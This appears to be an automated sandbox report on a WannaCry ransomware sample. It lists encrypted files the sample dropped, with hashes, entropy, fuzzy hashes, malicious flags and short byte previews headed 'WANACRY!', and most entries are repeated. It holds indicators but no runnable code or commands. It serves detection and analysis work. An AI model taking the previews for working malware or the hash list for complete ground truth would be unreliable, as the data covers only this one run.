                                                                                      Preview:WANACRY!.......k...3.$.I..E..FHo.Si\.+7.....)._.T{`,.v2..Lg$..1%.B.......s.@..eo...SG.*G.h..J.J....9gA...aa.(..E-R.....8l._.k....O........(N8......F.......0:..2[...c.~~..,<......&."..z^.I...q.B?...U"...b.8.E..:;x..C.s.....GD....E.....z.<<!....t....^F|...z.-u..K...............L....-..4..9N....FK....G.\....m.......Ta.hj.....:.w,..s..A../8T.;.*6........w.....f.Bk.j...%fC'..)@.92...m....Sc6....B/3?y.......s<.[oh...8....@.M...Z1Nx..'...E..?.^mp........I...h...M"3|.z.E...8..E.t6.. ...daC."w.i.9.m5......:.:.m,...T.dx..........+A.mSr.....V.9...`...........6AF.O.......1!.HUm.....h.Z..bK.R....m..2@&u.E/...1...T..Zi.C.m.Cv.D~].z\..bO..:..F.\2&..m.......u.\#"..z...i.e..>.$2............)....o$.Cq_..Q-....7qR..v`........).../wpv.$.,.x..9xH..9.(.&8[.?.R.........../.......S....L..m..,.Fq...+i...~v...3Qc3.RN;...1.#.C.y.B{|....=.?K....{....~Wo.H.j10.y1.]a}".....h|.;....... ......T.....'..1.[..'..w....U...yz..-|.?.t\%...".e#...j.....~....4..Q:.MW?..Dm.t...K...".
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):105400
                                                                                      Entropy (8bit):7.997984243947538
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:x5zuq8GiNBAMHDX5SF7RqEjdvDm1RvfLBwVj2FUKXuRUsZCF9JcbJ6VSxc:x5yqeNGMQRqEJvwLB2quKXuDCTQJPc
                                                                                      MD5:55ECFC0796245D01827A26F470D14C7A
                                                                                      SHA1:FBBE8545D5494953CFE85916218F80A324F358E2
                                                                                      SHA-256:B453B36C67F31ECC9C8534ED1001A9EA6142D070116788363EF19A2A1B8ACADF
                                                                                      SHA-512:DF656DEBBDDC96392052A5DA0DF6125106121FA50F21EE9D73C32D2D8F21D37A1735788EFEF2DD1ADF85063325FC7B9DC1B13B10F278DDF89FC99C3BB1F8E089
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......k...3.$.I..E..FHo.Si\.+7.....)._.T{`,.v2..Lg$..1%.B.......s.@..eo...SG.*G.h..J.J....9gA...aa.(..E-R.....8l._.k....O........(N8......F.......0:..2[...c.~~..,<......&."..z^.I...q.B?...U"...b.8.E..:;x..C.s.....GD....E.....z.<<!....t....^F|...z.-u..K...............L....-..4..9N....FK....G.\....m.......Ta.hj.....:.w,..s..A../8T.;.*6........w.....f.Bk.j...%fC'..)@.92...m....Sc6....B/3?y.......s<.[oh...8....@.M...Z1Nx..'...E..?.^mp........I...h...M"3|.z.E...8..E.t6.. ...daC."w.i.9.m5......:.:.m,...T.dx..........+A.mSr.....V.9...`...........6AF.O.......1!.HUm.....h.Z..bK.R....m..2@&u.E/...1...T..Zi.C.m.Cv.D~].z\..bO..:..F.\2&..m.......u.\#"..z...i.e..>.$2............)....o$.Cq_..Q-....7qR..v`........).../wpv.$.,.x..9xH..9.(.&8[.?.R.........../.......S....L..m..,.Fq...+i...~v...3Qc3.RN;...1.#.C.y.B{|....=.?K....{....~Wo.H.j10.y1.]a}".....h|.;....... ......T.....'..1.[..'..w....U...yz..-|.?.t\%...".e#...j.....~....4..Q:.MW?..Dm.t...K...".
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):230936
                                                                                      Entropy (8bit):7.999244759142343
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:boijTf1dNz8rWqzQb5qvpPlZumowTOWZU:bhl/za9xPDukOWm
                                                                                      MD5:F7D68303CF1F983419C9C2423B3F177A
                                                                                      SHA1:D276C160121E112408D9D0808FA83F70ED41C409
                                                                                      SHA-256:E3E18543D065AC051BC4EC058E8536B2022B305B75BC1761FA369EC86ABB2414
                                                                                      SHA-512:8C2BCDF620AF72DD99C5514270E2D3FB325FB3EEC8996043BA21E9741A9D75B0CE45C3C7568FA0CDE08E1B6BE075F06F2C0012BF14332D1B66056A2E24F78601
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......L......Z..q.....w...$r..W..;.}j.:S<...S..I....R.[,...r..}..5.<..."Hae..o....R.8.S._.2......dyB.x7.....M.a5.@?<7r...H..P.T......`L.5....M.....Q.kx|....:.W......z.>.4+.pd...C.p..?.z.......O4]5.p.L.*........>w..R2.S.......tau..3.>_.F..9~.n.A.............5.Qs.........bj...5S.c.[`..s............ez...D..3.d.[.l...+F.-../TW.86n.).@|.G5.M..:.m.....B.N+.....{.....i=(..!.2w.N...X.k.I...|......T.=.}.`.c.X..Y5..?....}Zv@p..._..ed...e.l......3.l.#"..../..UKY..Vyx#..m:.ldnQ>%&.@~D...z...qW...s]j.....%V..}......S}.5F.1p........&........&Ar.5^.As...h.5..EP.V[M.$.Y..."....h.F.W.!....U.F.._.2...._.7....g...W....... h.X_..K;...9.i(.....S{}W*!%,...._..w....d....2...'..A".?.%.....g.,1vT..Z`CJ...-...}.n.`."K.6Nf:.1.......?....O....oD......<f..z1o..A`.t.qG..]..rc*..:.Lx..+......M../N..)..+.!;...K.1+.....'.F...U.eN.v ...S......K.C.d...ei...%..$.9N&.F.(...v..j.j.p].g.tJ}..NnK)..r...n...K)...H....~@:".....)....].`,.}...B.4t...m7.{..$.Q`I.U..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):230936
                                                                                      Entropy (8bit):7.999244759142343
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:boijTf1dNz8rWqzQb5qvpPlZumowTOWZU:bhl/za9xPDukOWm
                                                                                      MD5:F7D68303CF1F983419C9C2423B3F177A
                                                                                      SHA1:D276C160121E112408D9D0808FA83F70ED41C409
                                                                                      SHA-256:E3E18543D065AC051BC4EC058E8536B2022B305B75BC1761FA369EC86ABB2414
                                                                                      SHA-512:8C2BCDF620AF72DD99C5514270E2D3FB325FB3EEC8996043BA21E9741A9D75B0CE45C3C7568FA0CDE08E1B6BE075F06F2C0012BF14332D1B66056A2E24F78601
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......L......Z..q.....w...$r..W..;.}j.:S<...S..I....R.[,...r..}..5.<..."Hae..o....R.8.S._.2......dyB.x7.....M.a5.@?<7r...H..P.T......`L.5....M.....Q.kx|....:.W......z.>.4+.pd...C.p..?.z.......O4]5.p.L.*........>w..R2.S.......tau..3.>_.F..9~.n.A.............5.Qs.........bj...5S.c.[`..s............ez...D..3.d.[.l...+F.-../TW.86n.).@|.G5.M..:.m.....B.N+.....{.....i=(..!.2w.N...X.k.I...|......T.=.}.`.c.X..Y5..?....}Zv@p..._..ed...e.l......3.l.#"..../..UKY..Vyx#..m:.ldnQ>%&.@~D...z...qW...s]j.....%V..}......S}.5F.1p........&........&Ar.5^.As...h.5..EP.V[M.$.Y..."....h.F.W.!....U.F.._.2...._.7....g...W....... h.X_..K;...9.i(.....S{}W*!%,...._..w....d....2...'..A".?.%.....g.,1vT..Z`CJ...-...}.n.`."K.6Nf:.1.......?....O....oD......<f..z1o..A`.t.qG..]..rc*..:.Lx..+......M../N..)..+.!;...K.1+.....'.F...U.eN.v ...S......K.C.d...ei...%..$.9N&.F.(...v..j.j.p].g.tJ}..NnK)..r...n...K)...H....~@:".....)....].`,.}...B.4t...m7.{..$.Q`I.U..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):204888
                                                                                      Entropy (8bit):7.999030345992689
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:n0KWT0G4d74+2psvWTK3X0j/rVPHiwgNdpOulY:1w4X8svWToX03swgNdpxY
                                                                                      MD5:49C2A8BDBAFB7B20AA39E87B6648E1B5
                                                                                      SHA1:398EF1545C2E1C082F2F785B15EE6C5985EE18E8
                                                                                      SHA-256:322CA6C4282D87A11901090F81DABE97418EAF39939BB51D0C4DD5EC12227ED7
                                                                                      SHA-512:B47FD3701885CD5EBEB7EC955C59240007842E7BE55032BF91FE1141FE10D27F0DC54D53EF83A34D6A0F660BC0CB5924FFBC11E42FB833F120E4DE5E55626EBD
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....q.x.O....)'amf.....!.{.c....N?.5V.}\6L?...c...|...........[..p5...\.'.@2...(N8;wm...g.k.?...J.sy..>.Ac.$....X...y.."..;..y...Q..eX.b...Z...u.I.fIz.;..h.f........d...]h.q...FW......[.............;.s..E.....k].*...U......E...r...3"0z..Yf..!t.~.x....7.........[....0.6.v....6.D.j....'..(.G&H.5lC..g..g.m`n.....j=.6hWM.Q..J.|o).....t0.[L@/..\.F[...u$[..-.J..N....e./.......,.JQ..T......X....tE..S,...3...*..n.Sgu........^na.[.....@"...._>J..E.Iq...B.K.$aQ.....1.u.....6_vd..o>.....-.k.?..{<5NR..c..'}...J..P..U..J8!Q...$J...% do.d.w.n.....w...<0n..L?<=o....$....!d3..+....?....D.0......n......V..&...a5.[A..:?.THT>..8.J.f....)<...N..\:..q.....F.9GOi..~......`...RvY....n.....<.".|".O...&..Z.....f.?....S.8z.Y.=...5...y...zw~T.7.........p.Xb%..w.;...%...f..ZdF>6.hk^kB@[>......^*..q..>....E.r.Q. .o.5w.I.~J.I......0...0....C..a.c...R..\dq.}.v_I.X?...1V...9WV...e.F.o|.D...........pU..r.-.C[Nw..A.N..N..2........o>+....m.....n~.+a.u.B....F...W"
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):204888
                                                                                      Entropy (8bit):7.999030345992689
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:n0KWT0G4d74+2psvWTK3X0j/rVPHiwgNdpOulY:1w4X8svWToX03swgNdpxY
                                                                                      MD5:49C2A8BDBAFB7B20AA39E87B6648E1B5
                                                                                      SHA1:398EF1545C2E1C082F2F785B15EE6C5985EE18E8
                                                                                      SHA-256:322CA6C4282D87A11901090F81DABE97418EAF39939BB51D0C4DD5EC12227ED7
                                                                                      SHA-512:B47FD3701885CD5EBEB7EC955C59240007842E7BE55032BF91FE1141FE10D27F0DC54D53EF83A34D6A0F660BC0CB5924FFBC11E42FB833F120E4DE5E55626EBD
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....q.x.O....)'amf.....!.{.c....N?.5V.}\6L?...c...|...........[..p5...\.'.@2...(N8;wm...g.k.?...J.sy..>.Ac.$....X...y.."..;..y...Q..eX.b...Z...u.I.fIz.;..h.f........d...]h.q...FW......[.............;.s..E.....k].*...U......E...r...3"0z..Yf..!t.~.x....7.........[....0.6.v....6.D.j....'..(.G&H.5lC..g..g.m`n.....j=.6hWM.Q..J.|o).....t0.[L@/..\.F[...u$[..-.J..N....e./.......,.JQ..T......X....tE..S,...3...*..n.Sgu........^na.[.....@"...._>J..E.Iq...B.K.$aQ.....1.u.....6_vd..o>.....-.k.?..{<5NR..c..'}...J..P..U..J8!Q...$J...% do.d.w.n.....w...<0n..L?<=o....$....!d3..+....?....D.0......n......V..&...a5.[A..:?.THT>..8.J.f....)<...N..\:..q.....F.9GOi..~......`...RvY....n.....<.".|".O...&..Z.....f.?....S.8z.Y.=...5...y...zw~T.7.........p.Xb%..w.;...%...f..ZdF>6.hk^kB@[>......^*..q..>....E.r.Q. .o.5w.I.~J.I......0...0....C..a.c...R..\dq.}.v_I.X?...1V...9WV...e.F.o|.D...........pU..r.-.C[Nw..A.N..N..2........o>+....m.....n~.+a.u.B....F...W"
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):537976
                                                                                      Entropy (8bit):7.9996310859358735
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:BtTUQB/pbyI1ZJAApt9YBtKRJSZEhcsxKI607Kz3UFWhwacvD:3TUowIXFqHiGsob0mgFfacvD
                                                                                      MD5:530AF3049BA980DDCA53DC152F1B8AE2
                                                                                      SHA1:F77686BEE8066F77AAAE70E7828B1A31292522A9
                                                                                      SHA-256:6267147510D6DCBC43CE4A732AB66BF60AA96A52CE0C0022B2D974A13D79EDB2
                                                                                      SHA-512:65EB735069D4B347AC3A40E87E9597D93FEB07DBA0AD1C44F9B7E422AECB3AF6C91EAB06B3FEDFE9B301627D0CF7D3A3930D4E2D1BC98AAE992B62645A6F870A
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........5,.g...b..+.....a...j.!.8.|lU..d+E.....m.'F.....nl.>.4..t.s....:3.#m...h.q.p|..?A i)..<WN...Z...e..g..0k.B...<mr.hS.........{..v.;..Z..C.a..lZY..xg*..S.9Jb.t..).....\]LG'...L^..Od....x.17.f!..d....}8{..x...C.=(G..C$._.;.....N.z...C3..,.Jls6....V4.......*...s.J.D$O.m....s...S...\B..[w|..,.*].a..D;!R..D.....-.t..^...S.g\...&..`...wL..$.6.j..TH.....k..."..{M.Oe?2..:.<]V...e..5.L...T.d...&.2..._S..p.C...AI.."\....2t.....T.g.............$...=p..&....u.\.u.O............O..X.2&......H..............+.I.u.X.........s....=..}.._F.[.....Y(..L..........F.I.o..Fy..w.1[t.7.1Z...K....w..!..%...+..|.&U..>....;.`.Ak.9....,...v./..`..!..@.N....].m.....a..i.m1...9....D.t..c....g..BH......}..r)1.e..2.w-.A..[...A$A.b~..7.+.k_A..Z.._-.E.Wf......C.:...T.d....)9..i...".......8.VP.=.p.V..{*..We..7..0.Wx.4K.6..(..>...MG')CK)Q).9...&G.MT.........P...bN...;.8+...x...y.o.....iN..JY..T8.L...$....P.C..f...tB.E....v...q.J..EQ..........A<.[p..m..?.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):537976
                                                                                      Entropy (8bit):7.9996310859358735
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:BtTUQB/pbyI1ZJAApt9YBtKRJSZEhcsxKI607Kz3UFWhwacvD:3TUowIXFqHiGsob0mgFfacvD
                                                                                      MD5:530AF3049BA980DDCA53DC152F1B8AE2
                                                                                      SHA1:F77686BEE8066F77AAAE70E7828B1A31292522A9
                                                                                      SHA-256:6267147510D6DCBC43CE4A732AB66BF60AA96A52CE0C0022B2D974A13D79EDB2
                                                                                      SHA-512:65EB735069D4B347AC3A40E87E9597D93FEB07DBA0AD1C44F9B7E422AECB3AF6C91EAB06B3FEDFE9B301627D0CF7D3A3930D4E2D1BC98AAE992B62645A6F870A
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........5,.g...b..+.....a...j.!.8.|lU..d+E.....m.'F.....nl.>.4..t.s....:3.#m...h.q.p|..?A i)..<WN...Z...e..g..0k.B...<mr.hS.........{..v.;..Z..C.a..lZY..xg*..S.9Jb.t..).....\]LG'...L^..Od....x.17.f!..d....}8{..x...C.=(G..C$._.;.....N.z...C3..,.Jls6....V4.......*...s.J.D$O.m....s...S...\B..[w|..,.*].a..D;!R..D.....-.t..^...S.g\...&..`...wL..$.6.j..TH.....k..."..{M.Oe?2..:.<]V...e..5.L...T.d...&.2..._S..p.C...AI.."\....2t.....T.g.............$...=p..&....u.\.u.O............O..X.2&......H..............+.I.u.X.........s....=..}.._F.[.....Y(..L..........F.I.o..Fy..w.1[t.7.1Z...K....w..!..%...+..|.&U..>....;.`.Ak.9....,...v./..`..!..@.N....].m.....a..i.m1...9....D.t..c....g..BH......}..r)1.e..2.w-.A..[...A$A.b~..7.+.k_A..Z.._-.E.Wf......C.:...T.d....)9..i...".......8.VP.=.p.V..{*..We..7..0.Wx.4K.6..(..>...MG')CK)Q).9...&G.MT.........P...bN...;.8+...x...y.o.....iN..JY..T8.L...$....P.C..f...tB.E....v...q.J..EQ..........A<.[p..m..?.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):95192
                                                                                      Entropy (8bit):7.998120247077162
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:CuulH2DCjvCkzE55kv2YOJ2XIaA7Bx9xitX53hiPRdrxOp8e1K/tIr5QXp/:Cuuw/kQ5Y9IaA7Bx9YP3MPRdKWO5QXp/
                                                                                      MD5:20DD81CB54D29874A9BE1FC1C9962A9D
                                                                                      SHA1:12A8743D838BC6C3E0F2E8CE3B9155CF6E9FEE99
                                                                                      SHA-256:2793FC365E44E7967C40DAE529B65957A547CDD50D21DE0618CAA0C03CD40DDD
                                                                                      SHA-512:7DC4AE9A5117A55D35C5F3FFA9222E90CD08BE32662D9ABBED7ED41E5A6C7FAE0AC4805FE7BA4D9382978D04BE2C6F82A07DF8776AE08F876A14226D4E46ABAE
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......A..QU.;B]...r'.$j.R....b.N....5u .e.N%...|....9<n..?.1....Pl..P.^uY....9.}yM..;7../X3. {`|...1M...,.K...W...*..1{.].@D....5S.*..$....k..80V. ..J..5|dY..b.G.|.uv*1..."P..=4.Zb.#E.a.....E0.GT...y&.....Tw.@....E.P..i.T5..9..C .1..C....C..>.....r......W..d:.&'.pO.?.RJ...2.f{F.....o.x.......\{:..S...*..> ...;.....EO'..NB.L..af...t..;.m....,x45.AggRr&.."8.......o..B..Z#....-.l.yX.......6..`*eJ.M3.........H.&..V.B.EH~...%.4;..~sF....T.}N.....2Z...N.......DP.R..?...$..B. ..,[s.S.r...V.X.....B.n...vr...lJqf0[T?.....E q?.....0y'...mK.@nD.D..{...z..6...D../.U..L.v..4.j.....|...rZ...GIASW.L..u...J...7VI..).i.Nni.t..S!'k.@..Q....|...]e.....Aa#4..D:..;X...I.OY.....w.5.n.U.f..+*!.+@....f...........tl.}..;$....h..h..Z.a....C...Gw.L.7........m.4.B..k.2...JW.].F...T.L(..z..W..s......lV."..Y...U/ac.M....<..F..:uAn........,.;]q7...w..y....|t...)3..q_..VH.Ig*..~.!........1C.).N.p...+..*..M../.h...n....3C.=...uU...=.K0....YP...)..J9/.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):95192
                                                                                      Entropy (8bit):7.998120247077162
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:CuulH2DCjvCkzE55kv2YOJ2XIaA7Bx9xitX53hiPRdrxOp8e1K/tIr5QXp/:Cuuw/kQ5Y9IaA7Bx9YP3MPRdKWO5QXp/
                                                                                      MD5:20DD81CB54D29874A9BE1FC1C9962A9D
                                                                                      SHA1:12A8743D838BC6C3E0F2E8CE3B9155CF6E9FEE99
                                                                                      SHA-256:2793FC365E44E7967C40DAE529B65957A547CDD50D21DE0618CAA0C03CD40DDD
                                                                                      SHA-512:7DC4AE9A5117A55D35C5F3FFA9222E90CD08BE32662D9ABBED7ED41E5A6C7FAE0AC4805FE7BA4D9382978D04BE2C6F82A07DF8776AE08F876A14226D4E46ABAE
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......A..QU.;B]...r'.$j.R....b.N....5u .e.N%...|....9<n..?.1....Pl..P.^uY....9.}yM..;7../X3. {`|...1M...,.K...W...*..1{.].@D....5S.*..$....k..80V. ..J..5|dY..b.G.|.uv*1..."P..=4.Zb.#E.a.....E0.GT...y&.....Tw.@....E.P..i.T5..9..C .1..C....C..>.....r......W..d:.&'.pO.?.RJ...2.f{F.....o.x.......\{:..S...*..> ...;.....EO'..NB.L..af...t..;.m....,x45.AggRr&.."8.......o..B..Z#....-.l.yX.......6..`*eJ.M3.........H.&..V.B.EH~...%.4;..~sF....T.}N.....2Z...N.......DP.R..?...$..B. ..,[s.S.r...V.X.....B.n...vr...lJqf0[T?.....E q?.....0y'...mK.@nD.D..{...z..6...D../.U..L.v..4.j.....|...rZ...GIASW.L..u...J...7VI..).i.Nni.t..S!'k.@..Q....|...]e.....Aa#4..D:..;X...I.OY.....w.5.n.U.f..+*!.+@....f...........tl.}..;$....h..h..Z.a....C...Gw.L.7........m.4.B..k.2...JW.].F...T.L(..z..W..s......lV."..Y...U/ac.M....<..F..:uAn........,.;]q7...w..y....|t...)3..q_..VH.Ig*..~.!........1C.).N.p...+..*..M../.h...n....3C.=...uU...=.K0....YP...)..J9/.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2296
                                                                                      Entropy (8bit):7.920092869791452
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkeKJT6ja2I9oW/QAMhVm+RWAwiRsTQcarg3OjH4wRGIqYZ3JHBKgIMoZO1:oeKJVCF2K9RsTyc+jH1gIrKgIMoi
                                                                                      MD5:EF151FBC8D7228C3BAE8AA65F59BDDF9
                                                                                      SHA1:38CD5ABD4E74A0491A91BC3E7AD9E47044473033
                                                                                      SHA-256:08B3DD88F51CC44B0F7AF5EE53F8C82A1D037387C9E5A734411241E14A438529
                                                                                      SHA-512:B85B076A2FE78FA51DFF43D1380E6AD3B5DC6A5013F67553DF4E56EF76B6991D22FE1A15350175816EFF6E5B5E0512C5FB78DBE623BD987CF06669CC685A9D06
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....c..^."#.,./<.....=9Wa&.......B..uo.....P..;....-:._.a.%^..."g.y.....A...Rxz5P..,..].....s%}...':..~..@WH.>`..IKO.v[X....R1%b7.6.R./.l@....4....1.#6.*E|>.q"..+...%...4..o2JZgE..Cc.*..chW...k.....<............n...;.@.......v.:.2....C.k...F.%...............k....o6.PF......e'..B.&..`.....Pg.R..._?c|.F.`P../b|......B{o.`{HK..d...<...t4.E...).7.b.n.S. ...e$L\...............Ez....>.......-.7.f6.?.;.......J.q.......-s6..... .i.`U..}s.Q...O 5=Z..9X...7p..:5.>*.K..Z:..0g...s..2..H.b...Q.<.....e..;m'......G..H..8;I.`.@..$@,...k.B.eqOD/....4...~...{.>..6&.t.{.,Y9..f...s...+~...=.H..MS.?.\.$T.M.i...fB.)l......\... rz.....k.S....'..v.j...#B.0...;......|.y.f....7.....EU.....B....4...Z..Q...d...!..+.N._..f.~.6..8?[E.(e?.W%...&....A.(...^A....>AR..vA...%....BPT(}3.3.....*.w.t\-......:."...Fq.$...z.,b!.4..1..N....DM. ......D..U..@.{..%.h.N. phC..r..q.._....P7...........mjb.R...(...-.V.X.. ..X.p.}....C`..}..w.1q..Q{.5g.D.N......o..X.]......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2296
                                                                                      Entropy (8bit):7.920092869791452
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkeKJT6ja2I9oW/QAMhVm+RWAwiRsTQcarg3OjH4wRGIqYZ3JHBKgIMoZO1:oeKJVCF2K9RsTyc+jH1gIrKgIMoi
                                                                                      MD5:EF151FBC8D7228C3BAE8AA65F59BDDF9
                                                                                      SHA1:38CD5ABD4E74A0491A91BC3E7AD9E47044473033
                                                                                      SHA-256:08B3DD88F51CC44B0F7AF5EE53F8C82A1D037387C9E5A734411241E14A438529
                                                                                      SHA-512:B85B076A2FE78FA51DFF43D1380E6AD3B5DC6A5013F67553DF4E56EF76B6991D22FE1A15350175816EFF6E5B5E0512C5FB78DBE623BD987CF06669CC685A9D06
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....c..^."#.,./<.....=9Wa&.......B..uo.....P..;....-:._.a.%^..."g.y.....A...Rxz5P..,..].....s%}...':..~..@WH.>`..IKO.v[X....R1%b7.6.R./.l@....4....1.#6.*E|>.q"..+...%...4..o2JZgE..Cc.*..chW...k.....<............n...;.@.......v.:.2....C.k...F.%...............k....o6.PF......e'..B.&..`.....Pg.R..._?c|.F.`P../b|......B{o.`{HK..d...<...t4.E...).7.b.n.S. ...e$L\...............Ez....>.......-.7.f6.?.;.......J.q.......-s6..... .i.`U..}s.Q...O 5=Z..9X...7p..:5.>*.K..Z:..0g...s..2..H.b...Q.<.....e..;m'......G..H..8;I.`.@..$@,...k.B.eqOD/....4...~...{.>..6&.t.{.,Y9..f...s...+~...=.H..MS.?.\.$T.M.i...fB.)l......\... rz.....k.S....'..v.j...#B.0...;......|.y.f....7.....EU.....B....4...Z..Q...d...!..+.N._..f.~.6..8?[E.(e?.W%...&....A.(...^A....>AR..vA...%....BPT(}3.3.....*.w.t\-......:."...Fq.$...z.,b!.4..1..N....DM. ......D..U..@.{..%.h.N. phC..r..q.._....P7...........mjb.R...(...-.V.X.. ..X.p.}....C`..}..w.1q..Q{.5g.D.N......o..X.]......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):121496
                                                                                      Entropy (8bit):7.99832933640154
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:f7oXtnR+lfxO7h6oKt6yJ4SwHdLrvWe42iWcisBjIPsodBovZetj7r5a/qw3gwXj:SFRofU78A4e6/I0o0k3MvwwX8vysi6qz
                                                                                      MD5:9E34DC6054376A04EAA9D822025A6696
                                                                                      SHA1:93DF818D2F1F22F45F1DFF1C06C3C5393354C1D4
                                                                                      SHA-256:6691ADE4442C4EE169527E38FFAC49BE9163C522B8BDDA5115A250976AE5FCC7
                                                                                      SHA-512:5638B1A24F87BA16ED21492F9065938FA9817D8583C8D584A6FB56F5FA7479B00FC0B368CF547D6BEF87E28E1FB247A01E8DAB5FFEB458F3391C18C6F8F0A6E2
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......FDT2.....<6....`wcW.[........J...#....5..5b/....OF.h.*.a.J.(.,'......n(.Z..Z.....Ij!.....D.[...ea>9..... .[..... ..N..$........NI..._$g.....%R...n...... .O.._..@.I...c....3...H'...A{...~C=....'...W..S.0.T.`...~...j...6.uIk.uE...D......./q......~.......w.k....M..Ur..Z...Q... Y]..M...'...*.{.[dv.,r.i_....z.V..%....a...+...k..e......]....9r.i..7..@...ZlO.*..._.e..Q..Z.....\.b.a.....`/?.......2.......ggzD.l...4Ym..m..:.nbX!......B..F.....G.\.`S...E$........*...+ C.63d-b......{.(..k.F2%..D........b/.......!....,.W3[.W.vI>..m.T..k....R.9...&i>....G'....)b.".Z..!U.Qk...#<...<.;.U.>.q...(.,..0C.SQ:1p6...y...(^uT..p.?.0..w.5...._...oN..2..ftn.K..):.....).c...C..I.~b!Xg.wy.B...h..S.!.9..5...Wfs..b..i...N.bI._.+..1}.0.y..2XjT.c.:6..j.R.$......5...AP.e.O..?e.V..$w...2JA..BJJN.=..n._.?.S_..{.%$[|.VJa.#./KR...J.9.n..OH....:.'_?#.....w..(...~t>..Cs+&..:<|..f.+i.S.....P.s...=.......i.1<.>(........f...**y$.....b....d.....X....Q.]....CA....|7l
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):121496
                                                                                      Entropy (8bit):7.99832933640154
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:f7oXtnR+lfxO7h6oKt6yJ4SwHdLrvWe42iWcisBjIPsodBovZetj7r5a/qw3gwXj:SFRofU78A4e6/I0o0k3MvwwX8vysi6qz
                                                                                      MD5:9E34DC6054376A04EAA9D822025A6696
                                                                                      SHA1:93DF818D2F1F22F45F1DFF1C06C3C5393354C1D4
                                                                                      SHA-256:6691ADE4442C4EE169527E38FFAC49BE9163C522B8BDDA5115A250976AE5FCC7
                                                                                      SHA-512:5638B1A24F87BA16ED21492F9065938FA9817D8583C8D584A6FB56F5FA7479B00FC0B368CF547D6BEF87E28E1FB247A01E8DAB5FFEB458F3391C18C6F8F0A6E2
                                                                                      Malicious:true
